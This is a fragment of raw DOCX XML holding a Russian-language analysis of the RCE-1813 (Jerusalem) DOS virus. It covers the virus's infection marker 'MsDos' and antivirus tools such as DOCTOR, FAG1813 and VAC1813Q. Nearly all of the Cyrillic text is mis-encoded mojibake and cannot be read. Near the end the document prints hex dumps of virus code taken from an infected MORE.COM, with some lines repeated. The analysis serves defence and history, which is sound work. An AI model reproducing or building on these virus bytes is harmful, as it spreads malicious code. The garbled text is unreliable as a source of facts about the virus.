      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䥪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮��� �� ⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�뢠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뢠��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠩��� (8h) � �� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>8h  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����  横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쪨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筮 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१  �����஥  �६� ��᫥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠤�� ��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⢨� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ���� � ����ᠭ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MS DOS � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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>㠫��  ��䥪⮬ ���� ���뢠��� ��᪮� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭� �୮�� ���� � ����� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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஫���� ��� �࠭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㦥 㪠�뢠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������ ��� ���� ������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⠤�� ��⮭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13 �᫠ � ��⭨�� (⠪ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⭨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  � ��� ���� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� ᮡ�� �� ����᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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㤠���  ��  �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.   �����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��  ��  ����⪥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  ��   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DOS   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��  �   ⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१����  ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�⮦��� �� 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����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⠥���  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠��  ������  ���᭨��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��  � ����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  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>५����  �ࠢ����  ���������  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮��⥫��  �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饥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>: �� ������������� �����-� �������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॣ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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饭���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪥�� �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 ��᫥  �⮣� �������  �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>諮 � ����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� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��-�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡�� � ⥪�� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM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EXE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">騩 �� 㢥��祭�� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1808 - 182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稭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64�, 128� � �.�., ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� � ��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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R�E-1813  ����� �� ������ � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988 ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">㦥� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988 �. � ����� �� ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� ������⨢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⥪�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ��-��������, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭ � ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ���� ��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᫠���-�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), ������ �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� �� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬ ������,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢������� ���஬ �� ��५�᪮�  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  ��  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>10 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࣠������� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">50 ���⭨��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ���⨥ � ���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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ����� �।�� ����� ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 ��������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� 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砫��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>५�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� ��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୮ � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� � ����� ��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>:  ����⪨,  �᫨  ��  �⭨  �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫨 ��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�����  �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����� ��ࠦ����� �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묨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���訬��� � ����᪮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ⨪� ��⥪�ࠬ� ���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뫨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DOCTOR �.�.������ � ANTIDOS ����᪮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�⪨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���訥�� � ����� ��� ����� � �⨬ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뫨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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������ (DOCTOR1) � �.�.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">客� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(FAG1813 - ������ 1989 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ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FAG1813,  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">塞�� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SHAREWARE  (�.  ��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, 1989, T.1, No. 1), </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫� ��⮩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������ �� 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ᨢ�� ��ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��� (���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭� ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(1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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">)).   ���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४��ᨢ���  ��ࠡ�⪨  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮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� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ����� R��-1813 �.�.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">客� �뫠 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⭠� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RVA-C1813, � ������� VAC1813Q. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� ��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稪  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㥬���  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������� �� � ����⨢��� ����� ����� ����� ��� ���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ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪 �����頥� ���祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">3,  � ����� ��⠥�, �� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥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१������ � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢥����  �����  �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯨ᮪  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 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭� ���� ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥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⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪��� ⨯� � ��������,  � ��⭮��, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ���� �� ��ࠦ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設�  ���  �����⨢�樨  ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� VAC1813Q �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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०���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭�� ��直� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �������� ����⪠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� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६���� १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⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ ��� ������� ⨯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㡥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ������ � ���� ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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뫠 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">FAG_SU, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭��� Joe Ratcatcher &amp; Anre Moln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ଠ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 �����  �� ����� ����⪠ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ���� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  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 Black Friday (��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ୠ� ��⭨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  Israeli Virus (��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��᪨� ��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usalem (����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  Hebrew University, PLO (���), ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ୠ� 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Time (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- �.��⨪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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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erusalem Virus Version B [Jeru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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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饥  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣� � ������⥪��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ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 xml:space="preserve">(�.   ⠡�.3).  ������,  ����  ��  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ண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>뢠�� ��砩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���� �  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">।��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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�  �� ࠡ���  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫�஢��� � �������  ���⥪�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᪠ �� �ᥬ� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. � ��᫥���� ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DOCTOR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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩   ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७���    ��ࠡ���   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.    �  �⮬  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஢������ ����� ��ᬮ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����⢥��� ����⢥���  ���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  ���   �������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ������   ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  ����� 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  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਧ���  ��ࠦ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,    �����  ��⮨�   ��  5   ���⮢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ᮤ�ঠ�� ᫮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MsDos, ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॠ��������    ���ᨢ���    ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��  �⮣� ⨯�  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. ���  �⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楫�  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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COPY,  �᫨ ����⮢���  ᫮�� MsDos  � �⤥�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�  䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �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⥭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � �⨬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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-18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0   E9 92 00 73 55 4D 73 44 6F 73 00 01 FB 1D 00 00  ...sUMsDos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   00 1A 01 7B 07 C5 1B 4A 07 C5 1B 56 05 26 18 32  ...{...J...V.&amp;.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0   7D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  }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0   00 75 1D 80 00 00 00 80 00 75 1D 5C 00 75 1D 6C  .u.......u.\.u.l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0   00 75 1D 10 07 55 3C C5 00 55 3C 96 F2 04 00 4D  .u...U&lt;..U&lt;....M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0   5A 80 00 0E 00 04 00 03 00 25 04 25 A4 34 01 10  Z........%.%.4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0   07 84 19 C5 00 34 01 1C 00 00 00 6F 6E 0D 0A 24  .....4.....on..$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0   05 00 20 00 21 10 01 00 00 02 10 00 70 13 00 00  .. .!.......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0   B9 41 2A 7B 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01  .A*{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0   00 00 00 00 00 FC B4 E0 CD 21 80 FC E0 73 16 80  .........!...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0   FC 03 72 11 B4 DD BF 00 01 BE 10 07 03 F7 2E 8B  ..r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0   8D 11 00 CD 21 8C C8 05 10 00 8E D0 BC 00 07 50  ....!..........P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>01C0   B8 C5 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 39  ...P......1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. . . . . . . . . . . . . . . . . . . . . . . . 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E0   1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9D  ...$%.!.._^ZY[X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F0   2E FF 2E 17 00 00 00 00 00 00 00 00 00 00 00 00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0   75 1D 56 31 38 31 33 4C 41 54 2E 43 4F 4D 00 01  u.V1813LAT.COM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0   22 2F 01 26 18 4D 73 44 6F 73 00 01 21 21 00 00  "/.&amp;.MsDos..!!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0   4D 26 18 00 10 50 1C 4A 07 50 1C 56 05 66 1A D2  M&amp;...P.J.P.V.f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30   E9 92 00 73 55 4D 73 44 6F 73 00 01 FB 1D 00 00  ...sUMsDos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0   00 1A 01 7B 07 C5 1B 4A 07 C5 1B 56 05 26 18 32  ...{...J...V.&amp;.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0750   7D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  }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0   00 75 1D 80 00 00 00 80 00 75 1D 5C 00 75 1D 6C  .u.......u.\.u.l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0   00 75 1D 10 07 55 3C C5 00 55 3C 96 F2 04 00 4D  .u...U&lt;..U&lt;....M</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0780   5A 80 00 0E 00 04 00 03 00 25 04 25 A4 34 01 10  Z........%.%.4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90   07 84 19 C5 00 34 01 1C 00 00 00 6F 6E 0D 0A 24  .....4.....on..$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07A0   05 00 20 00 21 10 01 00 00 02 10 00 70 13 00 00  .. .!.......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B0   B9 41 2A 7B 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01  .A*{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C0   00 00 00 00 00 FC B4 E0 CD 21 80 FC E0 73 16 80  .........!...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D0   FC 03 72 11 B4 DD BF 00 01 BE 10 07 03 F7 2E 8B  ..r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E0   8D 11 00 CD 21 8C C8 05 10 00 8E D0 BC 00 07 50  ....!..........P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
